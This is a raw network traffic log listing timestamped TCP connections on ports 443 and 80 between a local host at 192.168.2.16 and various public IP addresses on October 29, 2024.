                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:46.956028938 CET44349754184.28.90.27192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:46.957276106 CET49754443192.168.2.16184.28.90.27
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:46.999339104 CET44349754184.28.90.27192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:47.168370008 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:47.199481010 CET44349754184.28.90.27192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:47.199562073 CET44349754184.28.90.27192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:47.200774908 CET49754443192.168.2.16184.28.90.27
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:47.200814009 CET49754443192.168.2.16184.28.90.27
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:47.200834036 CET44349754184.28.90.27192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:47.200846910 CET49754443192.168.2.16184.28.90.27
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:47.200853109 CET44349754184.28.90.27192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:47.769438982 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:48.040388107 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:48.982373953 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:51.345640898 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:51.393378973 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:51.649380922 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:51.699016094 CET49755443192.168.2.1620.12.23.50
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:51.699071884 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:51.699212074 CET49755443192.168.2.1620.12.23.50
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:51.700351954 CET49755443192.168.2.1620.12.23.50
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:51.700365067 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:52.256354094 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:52.608501911 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:52.608575106 CET49755443192.168.2.1620.12.23.50
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:52.623795033 CET49755443192.168.2.1620.12.23.50
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:52.623809099 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:52.624044895 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:52.671293020 CET49755443192.168.2.1620.12.23.50
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:52.729547024 CET49755443192.168.2.1620.12.23.50
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:52.775341988 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.023072004 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.023108006 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.023117065 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.023132086 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.023163080 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.023175001 CET49755443192.168.2.1620.12.23.50
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.023202896 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.023230076 CET49755443192.168.2.1620.12.23.50
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.023251057 CET49755443192.168.2.1620.12.23.50
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.023355007 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.023427010 CET49755443192.168.2.1620.12.23.50
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.023433924 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.023978949 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.024030924 CET49755443192.168.2.1620.12.23.50
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.035418034 CET49755443192.168.2.1620.12.23.50
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.035458088 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.035473108 CET49755443192.168.2.1620.12.23.50
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.035480976 CET4434975520.12.23.50192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:53.469357014 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.244909048 CET44349749142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.245001078 CET44349749142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.245218992 CET49749443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.660007000 CET49749443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.660080910 CET44349749142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.882365942 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.963154078 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.963202000 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.963324070 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.963551044 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.963563919 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.010163069 CET49757443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.010210037 CET44349757192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.010333061 CET49757443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.010766983 CET49757443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.010778904 CET44349757192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.017174959 CET49758443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.017215014 CET44349758104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.017301083 CET49758443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.017599106 CET49758443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.017610073 CET44349758104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.201339960 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.614444971 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.614780903 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.614800930 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.615849972 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.615931988 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.617079020 CET44349757192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.617427111 CET49757443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.617449999 CET44349757192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.617790937 CET44349757192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.618092060 CET49757443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.618154049 CET44349757192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.618225098 CET49757443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.620471001 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.620554924 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.620642900 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.620651007 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.634275913 CET44349758104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.634491920 CET49758443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.634501934 CET44349758104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.635535002 CET44349758104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.635612011 CET49758443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.635871887 CET49758443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.635924101 CET44349758104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.663330078 CET44349757192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.665297985 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.665299892 CET49757443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.681292057 CET49758443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.681301117 CET44349758104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.729315996 CET49758443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.746867895 CET44349757192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.747107029 CET44349757192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.747165918 CET49757443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.747811079 CET49757443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.747832060 CET44349757192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.750010967 CET49759443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.750036955 CET44349759192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.750113964 CET49759443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.750318050 CET49759443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.750332117 CET44349759192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964193106 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964278936 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964319944 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964318037 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964343071 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964386940 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964399099 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964407921 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964445114 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964451075 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964694977 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964718103 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964730978 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964737892 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.964770079 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.083288908 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.083364964 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.083399057 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.083410978 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.083441973 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.083478928 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.083623886 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.083981991 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.084007978 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.084019899 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.084028959 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.084064960 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.084073067 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.084114075 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.084151030 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.090306044 CET49756443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.090323925 CET44349756104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.122447968 CET49760443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.122486115 CET44349760142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.122554064 CET49760443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.122752905 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.122801065 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.122870922 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.123008013 CET49760443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.123025894 CET44349760142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.124794960 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.124810934 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.347002983 CET44349759192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.347305059 CET49759443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.347340107 CET44349759192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.347695112 CET44349759192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.347997904 CET49759443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.348072052 CET44349759192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.348129034 CET49759443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.395332098 CET44349759192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.474093914 CET44349759192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.474176884 CET44349759192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.474267006 CET49759443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.474941969 CET49759443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.474963903 CET44349759192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.651328087 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.740761995 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.741075993 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.741096020 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.742127895 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.742209911 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.743359089 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.743427038 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.743522882 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.743530035 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.795270920 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.869957924 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.922452927 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.989059925 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.989121914 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.989145041 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.989192009 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.989212990 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.989257097 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.989298105 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.989329100 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.989335060 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.989372969 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.002640963 CET44349760142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.003987074 CET49760443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.004018068 CET44349760142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.005142927 CET44349760142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.005330086 CET49760443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.005578041 CET49760443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.005656958 CET44349760142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.005753994 CET49760443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.005765915 CET44349760142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.050468922 CET49760443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.108148098 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.108185053 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.108266115 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.108341932 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.108481884 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.108481884 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.108505964 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.108575106 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.226912022 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.226944923 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.227229118 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.227262020 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.227410078 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.272533894 CET44349760142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.272665977 CET44349760142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.272865057 CET49760443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.272897005 CET44349760142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.273844004 CET49760443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.274019003 CET44349760142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.274106026 CET49760443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.292303085 CET49762443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.292346001 CET44349762142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.292435884 CET49762443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.292712927 CET49762443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.292732954 CET44349762142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.346008062 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.346074104 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.346193075 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.346221924 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.346280098 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.346302032 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.464648008 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.464703083 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.464795113 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.464832067 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.464850903 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.464874983 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.507730961 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.507926941 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.508048058 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.508048058 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.508318901 CET49761443192.168.2.16151.101.130.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.508362055 CET44349761151.101.130.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.519818068 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.519869089 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.519982100 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.520716906 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.520735025 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.123193026 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.123620987 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.123652935 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.124680042 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.124840975 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.125094891 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.125154972 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.125273943 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.125282049 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.137509108 CET44349762142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.137743950 CET49762443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.137758970 CET44349762142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.138801098 CET44349762142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.138869047 CET49762443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.139127970 CET49762443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.139178991 CET44349762142.250.184.196192.168.2.16
